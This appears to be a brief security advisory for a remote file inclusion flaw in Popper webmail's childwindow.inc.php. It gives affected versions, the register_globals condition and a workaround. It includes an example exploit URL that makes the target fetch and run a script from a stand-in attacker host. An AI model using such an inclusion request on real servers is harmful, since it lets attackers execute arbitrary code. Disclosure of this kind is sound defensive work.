      Popper Webmail Code Execution

    SUMMARY

    "Popper is a webmail application written in PHP that allows users to read
    and send their e-mail messages using a web browser."

    Popper is vulnerable to remote code inclusion bug in its PHP script that
    can be abused by malicious attackers to cause the PHP enviroment to
    execute arbitrary code.

    DETAILS

    Vulnerable Systems:
     * Popper webmail version 1.41-r2 and prior

    Vulnerable code in childwindow.inc.php:

    Vulnerability can be exploited only if register_globals in php.ini file is
    set to 'on'. To exploit this vulnerability, attacker has to put script
    like test.form.inc.php on www.evilsite.com HTTP server, and call URL
    like:
    http://www.vulnsite.com/popper/childwindow.inc.php?form=http://evilsite.com/test

    Workaround:
    Set register_globals to off.
